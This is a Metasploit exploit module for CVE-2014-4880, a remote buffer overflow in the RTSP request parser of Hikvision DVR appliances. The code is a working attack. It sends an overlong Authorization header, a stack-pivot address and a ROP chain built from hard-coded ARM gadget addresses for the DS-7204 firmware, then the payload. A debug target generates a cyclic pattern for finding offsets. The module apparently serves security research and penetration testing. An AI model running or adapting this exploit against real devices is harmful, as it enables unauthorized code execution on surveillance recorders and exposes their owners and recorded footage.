Path: blob/master/modules/exploits/linux/misc/hikvision_rtsp_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Remote exploit module for CVE-2014-4880, a buffer overflow in the RTSP
# request parser of Hikvision DVR appliances (see 'References' below).
# Only the DS-7204 target carries a real ROP buffer; the "Debug Target"
# sends a cyclic pattern meant for offset discovery during development.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Exploit::Remote::Tcp

  # Registers the module metadata (targets, references, notes) and the
  # RPORT option, which defaults to 554, the standard RTSP port.
  #
  # @param info [Hash] metadata merged by the framework through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Hikvision DVR RTSP Request Remote Code Execution',
        'Description' => %q{
          This module exploits a buffer overflow in the RTSP request parsing
          code of Hikvision DVR appliances. The Hikvision DVR devices record
          video feeds of surveillance cameras and offer remote administration
          and playback of recorded footage.

          The vulnerability is present in several models / firmware versions
          but due to the available test device this module only supports
          the DS-7204 model.
        },
        'Author' => [
          'Mark Schloesser <mark_schloesser[at]rapid7.com>', # @repmovsb, vulnerability analysis & exploit dev
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2014-4880' ],
          [ 'URL', 'https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities' ]
        ],
        'Platform' => 'linux',
        'Arch' => ARCH_ARMLE,
        'Privileged' => true,
        'Targets' => [
          #
          # ROP targets are difficult to represent in the hash, use callbacks instead
          #
          # Each target's :callback names the method (checked with respond_to?
          # in #exploit) that builds the target-specific ROP buffer. The
          # string keys hold gadget addresses read back via target["..."];
          # the comment under each address is that gadget's disassembly.
          [
            "DS-7204 Firmware V2.2.10 build 131009", {

              # The callback handles all target-specific settings
              :callback => :target_ds7204_1,
              'g_adjustesp' => 0x002c828c,
              # ADD SP, SP, #0x350
              # LDMFD SP!, {R4-R6,PC}

              'g_r3fromsp' => 0x00446f80,
              # ADD R3, SP, #0x60+var_58
              # BLX R6

              'g_blxr3_pop' => 0x00456360,
              # BLX R3
              # LDMFD SP!, {R1-R7,PC}

              'g_popr3' => 0x0000fe98,
              # LDMFD SP!, {R3,PC}
            }
          ],

          [
            "Debug Target", {

              # The callback handles all target-specific settings
              :callback => :target_debug

            }
          ]

        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2014-11-19',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(554)
      ]
    )
  end

  # Builds and sends a single malformed RTSP PLAY request, then closes the
  # connection. Nothing is read back, so this method does not confirm
  # whether the device was affected.
  #
  # Request shape, in order: an "RTSP/1.0" PLAY line, "CSeq: 7", an
  # "Authorization: Basic" header whose value is 0x2a2 bytes of alphabetic
  # filler followed by a three-byte address, the header terminator, 19 more
  # filler bytes, the target's ROP buffer, 8 filler bytes and the encoded
  # payload. From a monitoring standpoint, an RTSP request carrying a Basic
  # credential of several hundred bytes is the observable signature of this
  # traffic.
  #
  # @raise via fail_with(Failure::NoTarget) when the selected target names
  #   no callback method on this module
  def exploit
    # respond_to?(..., true) also accepts private methods
    unless self.respond_to?(target[:callback], true)
      fail_with(Failure::NoTarget, "Invalid target specified: no callback function defined")
    end

    # Target-specific buffer: 24 bytes for DS-7204, a 2000-byte cyclic
    # pattern for the debug target
    device_rop = self.send(target[:callback])

    request = "PLAY rtsp://#{rhost}/ RTSP/1.0\r\n"
    request << "CSeq: 7\r\n"
    request << "Authorization: Basic "
    request << rand_text_alpha(0x280 + 34)
    # Address packed little-endian ("V"), low three bytes only: the high
    # byte of g_adjustesp is 0x00 and is not sent (presumably the parser
    # supplies it as the string terminator — not verifiable from here)
    request << [target["g_adjustesp"]].pack("V")[0..2]
    request << "\r\n\r\n"
    request << rand_text_alpha(19)

    # now append the ropchain
    request << device_rop
    request << rand_text_alpha(8)
    request << payload.encoded

    connect
    sock.put(request)
    disconnect
  end

  # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
  #
  # Builds the 24-byte ROP buffer for the DS-7204 target: six 4-byte slots
  # laid out as in the CHAIN sketch below. Offsets 8, 12 and 20 receive the
  # gadget addresses from the target hash, packed little-endian; offsets
  # 0, 4 and 16 (the entries shown as 0 in the sketch) are left as random
  # filler, presumably because their values are don't-cares.
  #
  # @return [String] 24-byte buffer that #exploit appends after the overflow
  def target_ds7204_1
    # Create a fixed-size buffer for the rop chain
    ropbuf = rand_text_alpha(24)

    # CHAIN = [
    #   0,                  #R4 pop adjustsp
    #   0,                  #R5 pop adjustsp
    #   GADGET_BLXR3_POP,   #R6 pop adjustsp
    #   GADGET_POPR3,
    #   0,                  #R3 pop
    #   GADGET_R3FROMSP,
    # ]

    ropbuf[8, 4] = [target["g_blxr3_pop"]].pack("V")
    ropbuf[12, 4] = [target["g_popr3"]].pack("V")
    ropbuf[20, 4] = [target["g_r3fromsp"]].pack("V")

    return ropbuf
  end

  # Generate a buffer that provides a starting point for exploit development
  #
  # @return [String] 2000-byte cyclic pattern from Rex::Text.pattern_create;
  #   not a working chain, only useful for locating offsets in a crash
  def target_debug
    Rex::Text.pattern_create(2000)
  end

  # Reads the target host straight from the datastore (overriding the
  # accessor the Tcp mixin would otherwise provide — reason not recorded).
  def rhost
    datastore['RHOST']
  end

  # Reads the target port straight from the datastore; defaults to 554 via
  # the RPORT option registered in #initialize.
  def rport
    datastore['RPORT']
  end
end